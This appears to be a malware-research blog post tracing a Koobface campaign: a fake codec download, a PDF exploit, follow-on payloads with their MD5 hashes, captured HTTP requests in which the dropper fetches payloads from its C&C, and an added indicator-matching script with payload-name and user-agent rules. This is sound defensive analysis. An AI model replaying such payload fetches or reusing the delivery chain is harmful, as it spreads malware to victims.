MalwareIntelligence is a site dedicated to research on everything related to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.


Koobface circuit from (BKCNET "SIA" IZZI)

After several months with no news of Koobface, at least of its typical propagation using the classic fake YouTube page as cover for the attack, it is back with another season of propagation.

This time it again spreads through visual social engineering, but not with the usual YouTube video template: it uses a page with pornographic content instead.

As shown in the capture, when you try to play any of the supposed videos, a small window warns that a codec needs to be downloaded. Accepting downloads Koobface disguised as a binary called codec.exe (5910e59d592781cec3234abf57f8d000), from an IP address that also resolves the domain. This IP has been used for Koobface propagation since March 2010.

In addition, the page embeds a script that redirects traffic to download a PDF file containing an exploit for CVE-2008-2992.

On the same IP there is also evidence that makes it clear its administration is carried out through a known crimeware kit: YES Exploit System.

The codec.exe executable is packed with UPX (UPX 0.89.6 - 1.02/1.05-1.22 -> Markus&Laszlo). When run, it generates a self-deleting BAT file with instructions to contact the C&C, which provides access to the location from which it drops the following malicious code:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive

The BAT contains the following connection statement, which reports information to the C&C:

That domain sits on the same IP address, with instructions to download further malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

This is a rogue copy of Security Essentials 2010. It connects to one location from which it downloads the file firewall.dll (a0160e8ede623b1df7d677b8d52fdc48) and to another from which it downloads exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik), which has a very low detection rate.
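The captured GET requests and the hash list above are the concrete indicators a defender can act on. The following script is an added example, not code from the original post: it matches proxy log lines against the payload names seen in the traffic and checks file digests against the MD5s quoted in the write-up. The log format, the client IPs and the sample lines are constructed for the example; the only request paths actually shown on the page are /dm.exe and /wsc.exe, and the remaining names are assumed to be served under their own file names.

```python
import hashlib
import os
import re
from dataclasses import dataclass, field

# MD5 indicators quoted from the write-up (digest -> file name and family).
KNOWN_MD5 = {
    "5910e59d592781cec3234abf57f8d000": "codec.exe (Koobface dropper)",
    "80427b754b11de653758dd5e1ba3de1c": "wsc.exe (Koobface)",
    "b658d9b812454e99b2915ab2e9594b94": "dm.exe (TDSS)",
    "08f214c0bd61faba2f8ed89cb8f40bc0": "pi.exe (FakeAV)",
    "a0160e8ede623b1df7d677b8d52fdc48": "firewall.dll (FakeAV component)",
    "5839ca78aab96724aa646789ebc24305": "exe.exe (Olmarik)",
}

# Payload file names named in the write-up. Only /dm.exe and /wsc.exe appear
# in the captured traffic; the others are assumed to use their own names.
KNOWN_NAMES = {"codec.exe", "wsc.exe", "dm.exe", "pi.exe", "firewall.dll", "exe.exe"}

# User-Agent the dropper sent in the captured requests. On its own it is a weak
# signal (real MSIE 6 clients existed), so it is only used as supporting evidence.
DROPPER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

# Constructed proxy-log line format (assumption): <ts> <client> <method> <path> "<ua>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+"(?P<ua>[^"]*)"\s*$'
)

# Constructed sample log: two benign requests and the two payload fetches.
SAMPLE_LOG = """\
2010-06-01T10:00:01Z 10.0.0.5 GET /index.html "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
2010-06-01T10:00:07Z 10.0.0.5 GET /dm.exe "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2010-06-01T10:00:09Z 10.0.0.5 GET /wsc.exe "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2010-06-01T10:01:00Z 10.0.0.9 GET /images/logo.png "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
"""


@dataclass
class Alert:
    ts: str
    client: str
    path: str
    reasons: list = field(default_factory=list)


def classify_request(path: str, ua: str) -> list:
    """Return the reasons a request matches the Koobface download circuit."""
    reasons = []
    name = os.path.basename(path.split("?", 1)[0]).lower()
    if name in KNOWN_NAMES:
        reasons.append(f"download of known payload name '{name}'")
        # The user-agent only strengthens an alert; it never raises one alone.
        if ua == DROPPER_UA:
            reasons.append("user-agent matches the dropper's hard-coded MSIE 6.0 string")
    return reasons


def scan_log(text: str) -> list:
    """Parse proxy log lines and return an Alert for each matching request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the assumed format
        reasons = classify_request(m["path"], m["ua"])
        if reasons:
            alerts.append(Alert(m["ts"], m["client"], m["path"], reasons))
    return alerts


def lookup_md5(digest: str):
    """Look up an MD5 hex digest against the indicators from the write-up."""
    return KNOWN_MD5.get(digest.lower())


def identify_file(data: bytes):
    """Hash raw file bytes and look the digest up in the indicator table."""
    return lookup_md5(hashlib.md5(data).hexdigest())


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a.ts} {a.client} {a.path}: " + "; ".join(a.reasons))
    print(lookup_md5("b658d9b812454e99b2915ab2e9594b94"))
```

Run stand-alone, the script flags the two payload fetches from 10.0.0.5 and leaves the benign requests alone. Hash matching is exact, so it only catches these specific samples; the file-name rule is what carries over to repacked variants, which is why the two checks are kept separate.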

In short, the Koobface circuit run from BKCNET "SIA" IZZI involves different actors of the crime scene, interrelated with one another and pursuing the same goal: $$$$$ (feeding the underground economy), leaving behind a real portfolio of malware.

Underneath, it is managed by a known crimeware kit that costs around $1000 on the underground market and, once executed, is responsible for pointing the victim's computer at downloads of other malware, coordinated by affiliate ("business") members who increase their profits with each successful installation of the rogue.

Related information
Symbiosis malware present. Koobface
Koobface campaign spread through Blogspot
YES Exploit System and Crimeware-as-a-Service
YES Exploit System. Official Business Partner’s
